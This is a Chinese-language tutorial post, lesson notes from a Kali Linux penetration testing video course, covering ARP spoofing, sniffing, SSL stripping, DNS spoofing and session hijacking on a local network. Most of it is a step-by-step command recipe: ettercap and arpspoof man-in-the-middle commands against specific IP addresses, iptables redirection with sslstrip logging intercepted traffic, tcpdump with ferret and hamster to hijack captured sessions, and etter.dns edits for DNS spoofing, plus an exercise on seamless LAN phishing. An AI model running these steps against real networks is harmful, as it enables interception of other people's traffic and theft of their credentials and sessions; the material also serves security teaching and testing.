Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

简介:

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

/玄魂

目录

Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持      1

关于嗅探、arp欺骗、会话劫持.............................................................. 1

 

视频教程地址:http://edu.51cto.com/course/course_id-1887.html

关于嗅探、arp欺骗、会话劫持

l  1. google

l  2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html

l  http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html

会话劫持的实现手段

 

l  中间人攻击(arp欺骗,dns欺骗)

l  注射式攻击

Arp欺骗--ettercap

l  参数说明:http://www.91ri.org/4408.html

l  2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。

3./etc/NetworkManager/NetworkManager.conf  修改

4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward

6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺骗arpspoof

l   echo 1 >> /proc/sys/net/ipv4/ip_forward

l   arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l  tcpdump

l  wireshark

l  drafnet等其他自动化工具

Ssl数据嗅探

l  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)

l  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l  sslstrip  -p -l 10000 -w log.txt

session劫持-arp欺骗

l  tcpdump -i eth0 -w qq.cap

l  ferret -r qq.cap

l  hamster

l  http://hamster

l  选择目标

l  测试session

64位下ferret 安装

l   dpkg --add-architecture i386

l   apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l   sudo aptitude install ferret-sidejack:i386

 

session劫持-DNS欺骗

l   1. 使用 ettercap 进行arp欺骗

l   2.修改etter.dns 文件

/etc/ettercap/etter.dns

l   3.启用dns_spoof

课后练习

l  结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?

l  局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

 视频教程地址:http://edu.51cto.com/course/course_id-1887.html

ps:对此文章感兴趣的读者,可以加qq群:Hacking:303242737;Hacking-2群:147098303Hacking-3群:31371755hacking-4:201891680;Hacking-5群:316885176

 


本文转自玄魂博客园博客,原文链接:http://www.cnblogs.com/xuanhun/p/4117209.html,如需转载请自行联系原作者

目录
打赏
0
0
0
0
51
分享
相关文章
Android调试终极指南:ADB安装+多设备连接+ANR日志抓取全流程解析,覆盖环境变量配置/多设备调试/ANR日志分析全流程,附Win/Mac/Linux三平台解决方案
ADB(Android Debug Bridge)是安卓开发中的重要工具,用于连接电脑与安卓设备,实现文件传输、应用管理、日志抓取等功能。本文介绍了 ADB 的基本概念、安装配置及常用命令。包括:1) 基本命令如 `adb version` 和 `adb devices`;2) 权限操作如 `adb root` 和 `adb shell`;3) APK 操作如安装、卸载应用;4) 文件传输如 `adb push` 和 `adb pull`;5) 日志记录如 `adb logcat`;6) 系统信息获取如屏幕截图和录屏。通过这些功能,用户可高效调试和管理安卓设备。
Web安全-Linux网络协议
Web安全-Linux网络协议
124 4
深入解析:Linux网络配置工具ifconfig与ip命令的全面对比
虽然 `ifconfig`作为一个经典的网络配置工具,简单易用,但其功能已经不能满足现代网络配置的需求。相比之下,`ip`命令不仅功能全面,而且提供了一致且简洁的语法,适用于各种网络配置场景。因此,在实际使用中,推荐逐步过渡到 `ip`命令,以更好地适应现代网络管理需求。
132 11
深入解析操作系统控制台:阿里云Alibaba Cloud Linux(Alinux)的运维利器
本文将详细介绍阿里云的Alibaba Cloud Linux操作系统控制台的功能和优势。
182 6
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
151 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
深入解析Linux操作系统的内核优化策略
本文旨在探讨Linux操作系统内核的优化策略,包括内核参数调整、内存管理、CPU调度以及文件系统性能提升等方面。通过对这些关键领域的分析,我们可以理解如何有效地提高Linux系统的性能和稳定性,从而为用户提供更加流畅和高效的计算体验。
212 24
Linux内核中的进程调度算法解析####
【10月更文挑战第29天】 本文深入剖析了Linux操作系统的心脏——内核中至关重要的组成部分之一,即进程调度机制。不同于传统的摘要概述,我们将通过一段引人入胜的故事线来揭开进程调度算法的神秘面纱,展现其背后的精妙设计与复杂逻辑,让读者仿佛跟随一位虚拟的“进程侦探”,一步步探索Linux如何高效、公平地管理众多进程,确保系统资源的最优分配与利用。 ####
133 4
Linux内核中的进程调度算法解析####
本文深入探讨了Linux操作系统核心组件之一——进程调度器,着重分析了其采用的CFS(完全公平调度器)算法。不同于传统摘要对研究背景、方法、结果和结论的概述,本文摘要将直接揭示CFS算法的核心优势及其在现代多核处理器环境下如何实现高效、公平的资源分配,同时简要提及该算法如何优化系统响应时间和吞吐量,为读者快速构建对Linux进程调度机制的认知框架。 ####
如何在阿里云国际版Linux云服务器中自定义配置DNS
如何在阿里云国际版Linux云服务器中自定义配置DNS

相关产品

  • 云解析DNS
  • AI助理

    你好,我是AI助理

    可以解答问题、推荐解决方案等